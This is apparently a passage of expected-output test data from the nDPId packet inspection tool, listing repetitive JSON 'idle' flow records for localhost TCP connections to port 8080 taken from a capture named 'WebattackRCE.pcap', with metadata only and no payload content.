+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 